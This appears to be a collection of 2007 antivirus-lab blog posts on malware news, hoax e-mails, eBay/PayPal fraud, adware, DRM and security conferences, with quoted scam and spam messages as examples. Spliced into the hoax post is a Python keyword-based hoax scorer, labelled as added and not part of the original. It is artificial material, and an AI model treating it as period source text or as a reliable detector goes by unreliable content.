On the other hand, it does seem that cybercrime is still pretty lucrative, as long as you don't mind being incarcerated or monitored by government agencies for a while. The Fujacks author apparently has a very lucrative job waiting for him when he finishes his sentence, and three men who were recently fined by the FTC for surreptitiously distributing adware will apparently be keeping $3.2 million in profits from their underhanded activities.

While we haven’t won the war against malware authors by a long shot, it certainly seems that a few big battles have been won recently. Hopefully this trend will continue, and being a malware author will become more and more risky and less lucrative.

User Education

What is antivirus protection worth when users try all the tricks they know to see the Loveletter.jpg.vbs picture; why do they double-click on executable files? No matter whether it’s Kournikova, Labor Day greetings cards, or just an “undeliverable message” with “details” attached, many users don’t care.

Home users risk their privacy and may lose the ownership of their machines, but they can’t resist the temptation.

Corporate users are sometimes even less careful, as it’s not their machine and if it’s broken, it’s not their problem. The IT department will fix it.

“If the company sends the mails to my machine, they know what they are doing. Why shouldn’t I click on those mails?” I heard that once from a corporate user–it scared me, because it was that user who was causing an internal outbreak.

While that user enjoyed the weekend, the IT guys tried to regain control of their network. About 15 employees of that company were working the whole weekend, plus external consultants.

That was one of the most expensive double-clicks that company ever had.

Is it that hard to think twice?
Don’t users know enough about risks?
Don’t they know about the consequences of an outbreak?

What have we learned from history?

C’mon, it’s not that hard. :lol:

Next time you receive an unexpected (mail)-delivery, think twice before you let it pass your last line of defense.

Hacking vital infrastructure

There’s been a video created by the Idaho National Laboratory which is intended to simulate the possible havoc that could be wrought by a hacker who had access to their antiquated, largely-unsecured equipment.

The thing that’s most interesting to me is not so much the video or the article but the reaction from people in the comments. It really runs the gamut from “I AM L33T HAX0R! I PWN YOU, PH34R ME!!!1!!!” to “OMG, doom!! Fix it now!” to “This is all a conspiracy cooked up by The Man to keep us in fear!” There’s one comment that I found particularly well thought out:

I work in the electric power generation industry and have worked at nuclear and fossil generator stations for 30 years. We have made many adjustments to our security regarding computerized equipment over the years and continue to do so. While any individual company is vulnerable to hacking, the nuclear industry has built in many safeguards and redundant systems to protect the equipment. Add to this the ability to override and manually scram reactors, it is highly unlikely hackers could affect the running of the plant. Where this country is vulnerable is with the power grid that transfers this power across the country. Many people do not understand how the grid works but, suffice to say, the equipment is outdated and could be potentially harmed by hackers. This is where we should have our attention right now because this has the ability to affect all of the country.
Posted by: vnvet68 7:44 AM

The last two sentences seem to really get to the heart of the matter - the equipment being used to power this country is fairly antiquated and pre-dates the internet as we know it by quite some time. Network security was obviously not considered when the power infrastructure was set up, and little thought is going to it still.

Clearly it would be possible to cause problems with the existing set-up. Would it be easy? Almost certainly not. It would require specific internal knowledge of hardware that is not commonly used outside the power industry. Does that mean we should ignore it or dismiss it? Absolutely not. A massive power failure, even on a local level, could have severe consequences in terms of people's safety and security as well as in terms of economics. Such a disruption in a major city could potentially affect millions of people.

Consider how much effort has gone into securing airports - shouldn’t we be at least as concerned with our power?

W32/Fujacks author faces prison: Justice served or a slap on the wrist?

In a follow-up to our previous blog: on September 24, 2007 the Chinese court system convicted Li Jun and sentenced him to 4 years in prison for authoring the W32/Fujacks virus. The W32/Fujacks virus (written in November 2006) spreads itself by infecting web pages, poorly secured file shares, and removable media, amongst others. But the main objective of the W32/Fujacks virus is to download password stealers that were used to target online accounts.

During the trial, Li Jun's lawyer attempted to show his value to Chinese society by presenting an offer letter from a networking company in Hangzhou that is interested in making Li Jun their CTO. His attorney went on to say that he has received over 10 offers from different companies that are willing to pay Li Jun over 1 million Chinese Yuan per year.

In his closing remarks, Li Jun’s lawyer was quoted as saying “A rare talent who is now regretful of his deeds and hopes to utilize his talents to contribute to society.”

So does the punishment fit the crime? A 4 year prison sentence does sound like a long time, but what will be more interesting is where Li Jun ends up once he has served his time in prison. Of course, that's assuming that he does indeed serve his full sentence of 4 years. The trial of Li Jun definitely sets a precedent that the lawmakers are willing to punish those who harm society, whether it be via physical means or via cyberspace.

Sources:
http://www.chinacourt.org/html/article/200709/24/266397.shtml
http://www.changjiangtimes.com/htm/2007-9-25/59385.htm
http://english.people.com.cn/90001/90776/6270740.html

Educational Hacking. Is it really a good idea?

There are, and always will be, different views on security information disclosure ethics. Thus I will not argue in one direction or the other. I will instead bring up a case as a "food-for-brain" example.

Would you trust someone that auctions a CD that "will make a hacker of you in only a few hours"?

What if the same guy sells free tools to "steal usernames and passwords" and "Sniff out AOL conversations"? For only 7.99 pounds you can also buy an "Easy virus construction" kit and a "Ready Made Virus".

Would you really believe it’s all “for educational use only on your own pc to test for any flaws in your system“?

Is this in any way educational, or is it just another shortcut to help script kiddies vandalize the internet? Is this really a good idea?

Unsafe Advertisements? Watch out for the fake yellows!!!

Browsing my webmail account on one of the biggest providers in Italy, I was hit by this popup message:

[Image: msgbox-1]

The cause of the JavaScript popup was the banner at the top of the page, urging me to download and install the SystemDoctor software.

[Image: MainPage]

I'm familiar with the brand; it's an application that claims your computer is full of errors and then asks you to buy the registered version to clean them.

To verify, I followed the link and installed the software which found 375 “severe errors” on a crystal clean Windows XP installation, including marking as “critical error” files dropped by the installer itself, perfectly legitimate registry keys etc. Asking for money to remove imaginary errors is, I would say, questionable behavior.

So the questions of the day are: "Should web service providers police their ads? Should they make sure paid banners are safe for their viewers? And will this trend of malware writers using paid ads to distribute malcode continue?"

Boot Virus Stoned.Angelina on Medion Laptops sold at Food Discounter Aldi

This one forced me to take a panicked look at my calendar to check the date; yes, it's still the year 2007 ;)

Confirming posts in various forums, there is indeed a part of the production run of Medion MD 96290 laptops, sold at the food discounter Aldi in Germany last week, that is infected with the boot virus Stoned.Angelina. In a document on their Danish website (in Danish) Medion describes the incident and provides instructions on how to remove the virus.

To make it clear, the name of the virus has absolutely nothing to do with any famous Hollywood star! Stoned.Angelina is a boot virus that infects the boot sector of floppies and the MBR of hard drives; it doesn't actually have a payload and was first discovered early in 1994. That was a time when the descriptions of the few viruses known were still in a printed Virus Encyclopaedia…

[Image: photo1]

How laptops that have Microsoft Vista preinstalled came to be infected with this ancient boot virus remains a bit of a mystery. The only way to infect a hard disk with a boot virus is by actually booting from an infected floppy. Not something I'd expect to be done nowadays when installing Vista…

[Image: My old Lab machine for replicating DOS viruses]

One lesson should be taken from this incident: the old viruses are not going away anytime soon. Looking at some customers' reports of viruses found, there is still the occasional Parity.b, Form.a and Tequila. Some weeks ago, even an image of a floppy disk infected with an Amiga virus was posted in an emulator Usenet newsgroup.

The end of Downloader-AAP?

Germany's Federal Criminal Police Office (the BKA) announced today that they busted an international group of phishers, arresting 10 persons and seizing a number of computers together with other evidence. From the press release it's evident this is the group that has been harassing the world with phishing emails containing Downloader-AAP as an attachment.

Downloader-AAP is ranked first in the list of ‘Top Corporate User Malware’ in our Avert Labs Threat Library. For many months there have been several waves a week of phishing emails carrying new variants of this downloader, which when executed would install some keylogging trojan. The emails typically look like a receipt sent from some company, with details supposedly to be found in the attached .zip. Some of these emails even claimed to come from German law enforcement agencies, stating that you’ve been caught sharing music, that content from your hard disk has been confiscated using the ‘Bundestrojaner’, and that the protocol is attached. Like in the example below:


I sincerely hope this is the last we’ve seen from this group.

China strikes back

Following recent allegations from the USA, Germany and lately Australia and New Zealand that government and military networks have been attacked out of China, and an earlier warning from the German Federal Office for the Protection of the Constitution (Verfassungsschutz) in February that increased hacking activity out of China had been detected, it is now China that steps forward and claims they “have suffered ‘massive’ losses of state secrets through the Internet”.

According to a Reuters report, Vice Minister of Information Industry Lou Qinjian said that China’s computer networks were riddled with security holes and that the United States and other hostile powers were exploiting those for “political infiltration”.

While I’m definitely not in any position to judge on who did what to whom, this is starting to look like a contest for the title of ‘Least Secure Government IT Systems’.

The closure of Soft Ice!

Maybe this is old news to some people, but I just learned that Compuware will no longer continue the development of NUMEGA Soft Ice. http://biz.yahoo.com/prnews/070611/clm093.html

From 1988 through 2003 I used Soft Ice almost on a daily basis. Without Soft Ice I do not know where I would have been in my career. I purchased almost every single release of Soft Ice, and I still have at least four or five boxes of Soft Ice and also Driver Works. I and many others did magical things to Windows systems (DOS, Windows 3.1, Windows 95, Windows Millennium, Windows NT 3.1, Windows NT 4.5, and Windows 2000) using Soft Ice. SoftIce will be greatly missed.

Certainly, Soft Ice will remain as the most powerful debugger ever built for personal computer systems. It is the only debugger that allowed us to do live kernel debugging on the same machine by just pressing Ctrl+D. I  still miss those days when I used to have two monitors connected to my computer, one CGA/EGA monitor connected to a CGA/EGA card for Soft Ice output and another VGA monitor connected to the VGA card for the regular Windows output.

Not sure how many people today will have missed Soft Ice like me, but certainly Soft Ice inspired many generations of personal computer system programmers, and computer hackers as well :-). Nowadays everyone uses WinDBG which, IMHO, is far less capable than Soft Ice.

More than ten years ago, kernel debugging using WinDBG was very painful, as it required two machines connected to each other via a null modem cable. During those days, SoftIce was the only option for live kernel debugging on the same system. SoftIce has a rich set of debugging commands for debugging device drivers as well as the windowing system. Nowadays kernel debugging and reverse engineering seem easier using a virtual environment like VMware Workstation or Virtual PC, and Microsoft also made the Windows public symbols available a couple of years ago, so reverse engineering is simpler these days. Nonetheless, nothing compares to the magic of hitting Ctrl+D and jumping immediately into the kernel debugger.

I can only wish that Compuware turns Soft ice into an open source project so that it does not die completely.

Digital Reality Misunderstanding

The Tuesday release of the much anticipated computer game BioShock has quickly turned up another clash between enthusiastic customers and the interests of publishers and copyright control. Reports indicate that the PC versions of the game, whether purchased on physical DVD media or via the Steam online distribution service, utilize a DRM scheme that limits the number of installations possible with a given license key. The apparent limit of two (due to customer uproar it appears this number is being raised to five) installations per license poses hurdles for users facing frequent system upgrades or recovery from system failures.

Interestingly, content owners and publishers face the same fundamental conundrum in implementing DRM as malware writers do in attempting to encrypt or otherwise obfuscate the code of their creations. The crux of it is this: If, in the end, you need to actually run code or play media content, there will necessarily be a time at which it runs in the original, unprotected form.

For the DRM case, let’s take commercial movies as an example. The data on DVDs, HD-DVDs, and Blu-ray discs is encrypted. But, ultimately, you need to get the original unencrypted data onto a display device. There’s simply no way around it. The player itself handles the initial decryption. Setting aside the flaws uncovered in the CSS and, more recently, AACS implementations, that was generally sufficient until purely digital displays and connections became more prevalent. At that point there was a risk of perfect digital duplication by simply sampling the unencrypted output from a player. HDCP is a clever attempt to plug that hole. It establishes an encrypted link between the player and display, moving the point at which the digital data is in its “raw” unprotected state as close as possible to the final output stage (within the processing electronics of the display itself), thus making digital duplication of the unprotected content more difficult. But still, the final unencrypted data has to be produced on the customer’s equipment for viewing. As such, an HDCP-compliant device could be constructed to gain access to that data and copy it.

In the case of BioShock it’s not raw media content being decrypted and displayed, but the act of allowing the game to run. At some point, after whatever checks or validation schemes are used, the customer needs to be able to actually play the game. As long as that path leads to the eventual successful launch of the game (all the data and resources needed for it to run are already on the system once it’s installed), it is possible to find a way to circumvent it and cut the DRM controls out of the picture.

Malware writers face a similar challenge when trying to obscure the code of their creations from security software using packers or encryption. Try as they might, they can’t get around the hard fact that they ultimately need to execute their original unobfuscated machine code. To do that, it has to exist in that state on the system at some point, even if as only one instruction at a time in memory. And since that’s true, we’ll always have a basic opportunity to get at it (though this is more difficult in some cases than in others).

Although the copyright lawyers may wish it otherwise, it’s a zero-sum game between usability and control. The only way to absolutely ensure that publicly distributed media content won’t be pirated, software won’t be run in an unauthorized way, or native code be accessed and identified is to encrypt the entire thing using a very strong algorithm with a highly random key, and then delete or never reveal that key to anyone. Did I say “absolutely”? That’s not quite right. The encryption algorithm or key chosen may have an unknown weakness that could later be revealed, so the only guaranteed solution is not to release the data at all! Of course, for a commercial product that would present a bit of a challenge for the marketing department (digital Cheese Shop, anyone?) and in the case of a malware executable would render it similarly useless to the author.

Unfortunately, in the case of DRM, trying to strike a balance between some degree of control and maintaining the ability of the software or media to operate can often end up inconveniencing and angering legitimate users. Pirates, on the other hand, will happily exploit this fundamental flaw as they develop software cracks and duplication methods to circumvent the protection.

However, in the case of security software versus malware obfuscation that same flaw ensures there will always be at least one chink in the armor for us to work on when we tackle the latest virus or Trojan.

It’s a Hoax…Or Is It?

Hoax virus warning messages are more than mere annoyances. After repeatedly becoming alarmed, only to learn that there was no real virus, computer users may get into the habit of ignoring all virus warning messages, leaving them especially vulnerable to the next real, and truly destructive, virus. 

For years, I’ve been telling people how to recognize new or new variations of hoax e-mails.  There are generally 5 things to look out for:

  • Hoaxes often mention a big industry company as the source for the information (e.g., Microsoft, AOL).
  • Hoaxes often say, in some wording or other, that the threat in question is the most powerful ever.
  • Hoax messages are often short and always give us the impression of fear.
  • Hoax creators ALWAYS ask their victims to spread the message to the maximum number of people possible.
  • Hoaxes often indicate that the threat was released at an indeterminate time (yesterday, for example, rather than specifying a date).

But what happens when the “hoax” information is (somewhat) true?

I came across an e-mail from a customer yesterday that, at first glance, looked like the usual hoax e-mail. After looking at it closely, though, it was definitely referencing the W32/Zhelatin.gen!eml threat.

Zhelatin Hoax

The surprise was that the very next paragraph, practically word for word, was the Virtual Card For You Hoax.

Virtual Card Hoax

What’s interesting about this is that the Zhelatin threat is not too far off from the general description of the hoax, even though we can see that all of the 5 hoax guidelines mentioned earlier are represented in the second half of the message, and they in no way reflect anything accurate about the Zhelatin threat.  However, this combination can confuse the user into thinking the entire message is a hoax, or that the Zhelatin threat is accurately described by the second half of the message.
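The five warning signs listed above, and the “half-right” message just described, lend themselves to a per-paragraph heuristic check. The following is an added example and not code from the original post; the regular expressions are constructed approximations of the five signs, and the sample message is constructed to mimic the structure of the customer’s e-mail (a genuine-looking first paragraph followed by a chain-letter paragraph), not to quote it.

```python
"""Heuristic scorer for the five hoax warning signs.

Added example, not from the original post. Patterns and sample text are
constructed for illustration; they are a starting point for triage, not a
verdict, which is exactly why the scoring is reported per paragraph.
"""
import re

# One pattern per warning sign. Each is a constructed approximation.
HOAX_INDICATORS = {
    # 1. a big industry company is cited as the source
    "big_company_cited": re.compile(
        r"\b(microsoft|aol|ibm|cnn|norton|mcafee)\b", re.I),
    # 2. the threat is "the most powerful ever"
    "superlative_threat": re.compile(
        r"\b(most|worst)\s+(powerful|destructive|dangerous|deadly)\b", re.I),
    # 3. short text built around fear
    "fear_wording": re.compile(
        r"\b(destroy|wipe out|erase|burn|crash|cannot be repaired)\b", re.I),
    # 4. the reader is told to forward it to everyone
    "forward_to_everyone": re.compile(
        r"\b(forward|send)\s+(this|it)\s+to\s+(everyone|all|every)\b", re.I),
    # 5. vague timing instead of a date
    "vague_timing": re.compile(
        r"\b(yesterday|this morning|last night|a few days ago)\b", re.I),
}


def score_paragraph(text):
    """Return the sorted list of indicator names that fire on `text`."""
    return sorted(name for name, rx in HOAX_INDICATORS.items() if rx.search(text))


def score_message(message):
    """Split on blank lines and score each paragraph separately."""
    paragraphs = [p.strip() for p in re.split(r"\n\s*\n", message) if p.strip()]
    return [(p, score_paragraph(p)) for p in paragraphs]


def classify(message, threshold=3):
    """'clean', 'hoax', or 'mixed' (some paragraphs hoax-like, others not).

    A paragraph counts as hoax-like when at least `threshold` of the five
    indicators fire. 'mixed' is the half-right case from the post.
    """
    scored = score_message(message)
    hoax_like = [hits for _, hits in scored if len(hits) >= threshold]
    if not hoax_like:
        return "clean"
    if len(hoax_like) == len(scored):
        return "hoax"
    return "mixed"


# Constructed sample: a plausible real-threat notice followed by a
# chain-letter paragraph in the style of the Virtual Card For You hoax.
SAMPLE_MESSAGE = """\
Warning: a new mass-mailing threat, W32/Zhelatin.gen!eml, is circulating as
an e-mail with a link to a fake greeting card. Update your DAT files and do
not follow links in unsolicited card notices.

A new virus was discovered yesterday! Microsoft and AOL announced it is the
most destructive virus ever. If you receive a Virtual Card For You, do not
open it: it will burn your hard disk and it cannot be repaired. Please forward
this to everyone you know.
"""

if __name__ == "__main__":
    for paragraph, hits in score_message(SAMPLE_MESSAGE):
        print(f"{len(hits)}/5 indicators: {hits}")
    print("verdict:", classify(SAMPLE_MESSAGE))
```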

I ended up telling the customer that the message is “half-right”, gave them both the Zhelatin and Virtual Card description links, and asked them to ensure that their Engine and DAT files were up to date.

As always, remember to follow our Security Tips, and if you have a question about a suspicious e-mail, send us a sample.


Chaos Communication Camp 2007 is over

So who said that Hackers cannot survive outside closed buildings?

Closing ceremony is just over and the approximately 2000 visitors of Chaos Communication Camp 2007 are packing their electronic gear and camping equipment, as well as assessing the damage caused by yesterday’s heavy rain. Those of you who did not make it here missed 5 days of exciting cultural exchange in a truly unique environment. To get an idea what it was like, check out the picture archive.

The hottest topics discussed all over the camp were a new German law banning hacker tools, now in effect, and the so-called Bundestrojaner, proposed to make online searches of suspects’ computers possible. And then there were talks. A lot of them, covering various technical, cultural, social and legal aspects. For those who missed a talk or missed the camp altogether there is some hope: all talks in the big speaking areas were recorded and will be made publicly available for download sometime later.

And finally what I liked most: PowerPoint Karaoke

Speakers and volunteers from the audience get a random PowerPoint presentation to present, seeing the slides for the first time while doing so. Just so funny to watch!

Chaos Communication Camp 2007 - The Open Air Defcon

Just 3 days after the closing ceremony of Defcon, security enthusiasts from all over the world continue their meetings at the Chaos Communication Camp 2007 at a retired military airport near Finowfurt, close to Berlin. Can you even imagine a camping site with fast Ethernet and power in every tent, crowded with some of the world’s leading security experts? If you’re not on site to witness it yourself, the answer is probably no, so here are some pictures.

Same as with Defcon, meeting people and exchanging information and ideas is really why most participants are here, but there are also a number of excellent talks. Many speakers chose to present here and didn’t bother going to Black Hat and Defcon, saving the hassle with U.S. immigration, giving their fingerprints at the border, etc. The talks are delivered in two concrete Quonset huts, a kind of overground bunker for fighter jets, which is just cool. Having just delivered my talk about Trojans, this is likely the most awesome location where I’ve ever spoken. Here is a schedule of the talks and the list of speakers. Besides those talks there are numerous activities, projects and workshops going on all over the camp, and there are dozens of small villages set up, including the Hackers on a Plane (Hackers on a Bus, really) and a large tent to hang out in by c-base, Berlin’s famous cultural project. Right now there is some thunder on the horizon, so let’s just hope it doesn’t start to rain, or there will be LOTS of mud-encrusted electronic devices for sale on your favorite internet auction site!

Full-Disclosure Immunity Debugger Hoax?

Oh the irony: apparently someone has taken issue with some of the things I have said about the Immunity Debugger, available from Immunity, and posted about an alleged backdoor within the program to the full-disclosure mailing list! Below is a copy of the beginning of the post:

From: goudatr0n
Date: Thu, 9 Aug 2007 13:58:01 -0400 (EDT)

Infosec researchers with the Greater Alliance of PHP
Programmers, headed by goudatr0n and in cooperation
with David Marcus, have discovered a backdoor in the
new Immunity Debugger.

1. PRODUCTS AFFECTED
Immunity Debugger (Immunity Security,
http://www.immunitysec.com/products-immdbg.shtml), All
Versions

2. OVERVIEW
The Immunity Debugger contains a backdoor that emails
session history, running applications and other system
information (location, IP address, machine Owner Name)
to an email address at immunitysec.com

The original post with full text and comments can be read here. Needless to say, I am not involved in any way. Let me restate that I think this to be a very powerful tool that was written for all the right reasons. My objections to it are how it can be used by all the wrong people to write more zero-day exploits, quicker and more efficiently. That puts users at risk. I know this is not the intent of the tool or Immunity.

I gotta say tho that anyone who takes the time to go through this much trouble to goof on me, I got nothing but love for!

The Zen of DefCon 15 Part 2

Now where was I in my ramblings? Oh yeah… presentations and DefCon music.

What I have always admired about DefCon content is that it is not exclusively about computer hacking but rather about hacking more as a way of thinking. In line with that, one of my favorite presentations was by Aaron Higbee, entitled Hack Your Car for Boost and Power, which discussed numerous ways (yes, some computer-based) of boosting a car’s horsepower. He covers many areas of tuning and even touches on privacy concerns with the on-board ECU.

I also very much liked Peter Gutmann’s talk on The Commercial Malware Industry, but one of the best talks was Lukas Grunwald’s Security by Politics - Why it will never work. Lukas, for those who don’t already know, is a quite clever security researcher from Germany who discussed what happens if security is driven by politics and compromise. He also covered the additional security risks introduced by the new generation of electronic passports. Lukas is simply brilliant in the areas of RFID and ePassport security. It was a very thought-provoking talk.

Many of the other talks were great but those really stick out in my mind (aside from our own Toralv and Dirk).

The Black Ball, another DefCon staple, was equally a hoot. Music was great as I have been a fan of Regenerator for quite a while now. They and the other DJs (Patrice, Wintamute, SailorGloom, Great Scott!, Catharsis and Kris Klink) are all worth a Google or two. Dark room, industrial noize, good beer and latex….. Ahh what more couldya want!

I highly recommend everyone bookmark the following sites: DefCon Forum and DefCon Pics as they will do the best job of post convention updates.

Cheers!

The Zen of DefCon 15 Part 1

DefCon gets quite a lot right and it is not just great content. Actually the content, IMHO, might be the LEAST important aspect to DefCon.

Let’s be honest here. We are all infosec warriors in the information age. We all keep pretty much up to date on security research, malware developments, game hacking, etc…. on a daily basis. Blogs, forums, podcasts and other mediums allow us to stay bleeding edge. We have to. Most information in most presentations at most conferences is a good 6 months old (not always, but usually). This is where DefCon distances itself from the pack.

If you really want to see where security theory and research practicality collide (fueled by Brew and Coffee Wars!) then the floor of DefCon is the place to be. Truthfully, it is the activities of DefCon, not the presentations, that you need to get caffeinated for:

* The Network @ DefCon
* 0wn the b0x
* Phreaking Challenge
* CTF (if you gotta ask…….)
* aCTF
* LPCON5 - Lockpicking Contest
* Hacker Jeopardy (one of my personal favorites)
* TCP/IP Drinking Game
* Wardriving Contest
* Wireless Village - ChurchofWiFi
* Lockpicking Village

No disrespect to the presenters or any of their content but pwning-in-action is what makes DefCon well…….. DefCon. This is where the training, conferences and theory all meets the pavement. Can you get root? Can you stop someone from getting root? Do you really know what you are doing? Hey, is that a custom PWS variant that just pwned my data? Ohhhh, I never saw that evasion before!!! It is events like the above where the real education takes place.

Oh and the Toxic BBQ! Part 2 later today…..

Presentations from BlackHat and DefCon

I have received several requests to post the final versions of John Viega and David Coffey’s BlackHat presentation as well as Toralv Dirro and Dirk Kollberg’s presentation from DefCon. They will be uploaded and available later today, as well as updated ramblings and musings from myself…..

Hacker Jeopardy was hilarious and the music at the Black Ball was great!!!

From the Floor of BlackHat and DefCon…

Your roving man-on-the-street Dave Marcus here at the middle escalator leading up to BlackHat 2007! I cannot really say that I am overflowing with excitement yet as I am fully un-caffeinated which is a rather disturbing thing considering all the content today.

I am looking forward to many of the briefings over the next several days–virtualization, stealth, fuzzing, etc. My geek cup truly runneth over. Avert Labs has a good showing this year at both BlackHat and DefCon as we have presentations at both. John Viega and Dave Coffey will be presenting on building effective application security at BlackHat, while Dirk Kollberg and Toralv Dirro will be discussing recent changes in Trojan developments at DefCon.

I will be attending briefings, blogging on happenings and cornering the l33tz for interviews for our AudioParasitics podcast. Stay tuned!

Multitasking Fraudsters

I had a recent encounter with online fraud and social engineering that was unusually complex.

I was selling an item on eBay. The item was brand new, and retails for $250. So, imagine my surprise when I received the email announcing the auction ended with a winning price of $395!

This was followed about two hours later by another email from eBay, notifying me that the auction had been canceled due to fraudulent bidding.

I didn’t think much of it, other than being mildly frustrated at later having to relist the item and wait for another auction to complete.

The next day I received a poorly constructed fake PayPal “confirmation” email, showing that the winner of the auction had sent me funds, not only for $395, but with an additional $100 for shipping! The terms at the end were distinctly out of sync with the actual PayPal process (warning of account cancellation unless the item was shipped and a tracking number sent, and the highly suspect paypal.enquiry@OfficeEmail.net address specified for communications). The shipping address for the item? A location in Nigeria.

What I found interesting was that the hyperlink to the eBay item included in this fake payment email pointed to the United Kingdom version of eBay and to a completely different item number. That auction had been pulled as well by the time I received the email, so I couldn’t examine what was going on. My suspicion is that my original auction posting may have been duplicated in hopes that it would remain if the original auction was discovered as fraudulent and canceled. (BTW, kudos to eBay for quickly identifying and canceling both!)

About an hour after this fake payment message, I got an email from the “winner” of the auction:

Hot on the heels of this, I next received what ended up being the final communication:

Although the whole endeavor lacked a lot in establishing authenticity, I was intrigued by the different elements that were used in the attempt. To sum up, we have:

  1. Fraudulent bidding to push an eBay item well beyond its reasonable value, along with…
  2. Possible duplication of the auction posting in an attempt to support…
  3. A fraudulent PayPal notice, which includes social engineering elements of both additional money and threatened account suspension, followed by…
  4. Multiple communications from the auction “winner” that also include both negative (threatening to involve law enforcement) and positive (offer of possibly even more money beyond the already ridiculously inflated price) social engineering elements.

That’s a good amount of work to go through to get hold of my $250 item! Nonetheless, I could imagine more sophisticated versions of such a multipronged fraud attack being disturbingly effective.

Fake advertising attempting to discredit Spamhaus

Last Thursday we noticed a large spam campaign attempting to discredit Spamhaus and DDoS their phone lines :roll:. This is undoubtedly linked somehow to the massive and long-term DDoS attacks on the three major blacklists run by Spamhaus, URIBL and SURBL (the latter two are currently being protected by the DDoS Jedi at Prolexic). DDoS attacks on this scale are risky for the botmasters, since they expose the botnets to those interested in such things.

Here is a copy of the mail:

From: Christy June <fake-sender@fake_place.com>
Date: Fri, 5 Jul 2007 20:34:52 +0100
To: “some, one” <spamme@mcafee.com>
Conversation: Which shalom myself magnetic
Subject: What shalom herself magnetic

WORKING TO PROTECT INTERNET NETWORKS WORLDWIDE
Spamhaus tracks the Internet’s Spammers, Spam Gangs and Spam Services, provides dependable realtime anti-spam protection for Internet networks, and works with Law Enforcement to identify and pursue spammers worldwide.

The SBL database is maintained by a dedicated international Spamhaus team based in 9 countries, working 24 hours a day, 7 days a week to list new confirmed spam issues and - just as importantly - to delist resolved issues.

The Spamhaus Exploits Block List (XBL) is a realtime database of IP addresses of illegal 3rd party exploits, including open proxies (HTTP, socks, AnalogX, wingate, etc), worms/viruses with built-in spam engines, and other types of trojan-horse exploits.

The Exploits Block List can be used by all modern mail servers, by setting your mail server’s anti-spam DNSBL feature (sometimes called “Blacklist DNS Servers” or “RBL servers”) to query xbl.spamhaus.org. Use of the XBL is free for users with normal mail servers (but networks with high email traffic should see DataFeed).

You can get MUCH MORE if you contact us:

The Spamhaus Project Ltd. 50 Churchill Square, Suite 6, Kings Hill, West Malling ME19 4YU United Kingdom, Tel (+44) 870 766 xxx

This is not an uncommon event for RBL owners; this one is unusual only because of the size, duration and indiscriminate nature of the campaign.

The spammer in this case also had to fake the sender’s address, because Spamhaus’s SPF record is of the “-all” variety, which sensibly denotes that they *only* permit one IP address to send mail for their domain, which affects the bots’ ability to deliver mail claiming to come from it.

Obviously Spamhaus do not use botnets to send out promotional material ;)
(If this all sounds a bit too fishy to be true you can read more about the traditional “Joe-Job” attack right here).

When Is WhenU MeMe?

Following up on a tip from my colleagues at McAfee’s SiteAdvisor, I examined an interesting piece of software recently from a provider I’d not heard of before, a product called “MeMe,” made by MeMedia, Inc.

The installation was immediate upon launching the installer, with no EULA or other notification displayed until the software was running. The MeMedia Web site suggests the software is intended to supplement a user’s browsing and general use of the Internet by tracking usage (locally, the software assures) and then proactively searching out and alerting the user to additional content that matches the interest categories that MeMe has identified. The term “meocentrism” is cutely coined on the product’s web site to describe this. I also read a notice that the software may be used “in support of free software,” suggesting potential bundling. Oddly, visiting MeMedia’s home page results only in a page with a logo and “coming soon,” though several subpages are accessible and the software appears to be available and functioning. The interface is designed to resemble a three-dimensional cube, and uses many shadow and animation effects:

Peeking under the hood, I grabbed some of the network traffic to verify that no user-browsing data was in fact being transmitted. I was surprised to find communication with servers in the whenu.com domain, and even parameters being passed in HTTP transmissions such as “&app=whenusave.” Save! (also incarnated as “SaveNow”) is an advertising client product made by WhenU. I did not note any personally identifiable data being transferred to remote systems during a few limited tests, but the indications point to a mechanism similar to what WhenU uses in its advertisement products (running search terms against a local database to preclude the need for sending user data from the local system). It appears that the MeMe software is somehow leveraging WhenU’s infrastructure. Along with many overlapping IP addresses and DNS records, we have indications that MeMedia is in partnership with or wholly owned by WhenU.

Crossing into speculation, I find interesting the apparent repurposing of adware infrastructure as a “usage assistant”; something to help a user find content on general topics of interest rather than simply pushing comparative product offers. The vendor achieves the same goal of connecting a user with specific content; MeMedia could easily define and control the data set that the client software could search to find the user’s identified interests. Vendors could feasibly monetize additions to such a content repository as well as more direct targeted advertising. If my speculation is correct, such a scenario–though not far removed from traditional push-advertising models–might at least be better accepted by users. Although the field of data such a “meocentric” digital helper could sift through might really be a walled garden of sponsored content, the idea seems less intrusive than a pop-up hawking a widget.

On my test environment, which is essentially clean of any usage data, MeMe “found” an article on Michael Vick for me after running for several minutes. This occurred even without my doing any browsing or other activity. I later found that several terms were apparently hard coded into the installer package (ExecuteParameters="/i\"rock;Chicago Bears;Serena Williams;Michael Vick\""), ensuring that the recipient would at least have some “interests” about which content could be “found” right off the bat.

It’s awfully kind of them to look out for us boring folk.  ;-)

Play With Fire and You Might Get Burned

Wired posted an excellent article recently that highlights the pitfalls of hiring a “blackhat” to do a “whitehat’s” job. Brett Shannon Johnson was once on the U.S. Secret Service’s most-wanted fugitives list for credit-card and identity theft. After being apprehended, he was recruited to help catch the bad guys as an operative for the Secret Service. Before long he was back to his old tricks.

“It was $350 a week [from the Secret Service] vs. $5,000 or $6,000 a week” from his fraudulent tax-refund scam, Johnson told Wired News by phone. Johnson had set up a tax-refund fraud scheme. The Secret Service caught him and he was arrested again.

Although Johnson claimed to have stopped $3 million in fraud before backsliding, he noted that having to work with his former partners in crime was like “taking an unrehabilitated crack or heroin addict and placing him in a drug environment, telling him not to use drugs.”

Trustworthiness is a huge consideration security companies ponder when looking at prospective candidates, and Brett Shannon Johnson is an example of why most security companies do not knowingly hire blackhats.

It has been standard policy for a long time in the anti-virus (AV) industry not to hire virus authors, largely because of the myth that it was the AV companies who wrote the threats that they then sold protection for. With the plethora of threats on the Internet today, I think most people understand that we have no reason to create any more work for ourselves. Of course, not everyone shares this zero-tolerance policy. In 2004, it was reported that Sven Jaschan, author of the Sasser worm, was hired by SecurePoint. This ended up costing the security firm a partner in the AV space; H+BEDV severed their ties with SecurePoint.

The topic of hiring someone who’s written a virus overlaps with our most recently published podcast, which tackles the issue of teaching malware authoring in higher education. For more on this topic, have a listen:
http://podcasts.mcafee.com/audioparasitics/

As for Brett Shannon Johnson, he aspires to work as a fraud consultant one day.

Trust is relative. Why would you trust a logo?

If we look at any large brand phish site these days they have “the security logo”; some call it a seal, smart icon or security stamp. You know the ones, they claim to “verify your site in real time” or give “confidence and assurance to trust the identity of your web site”.

The URL both logos link to is the same:
:evil:Phish:
https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=SCGI.EBAY.COM&lang=en
:cool:eBay:
https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=SCGI.EBAY.COM&lang=en

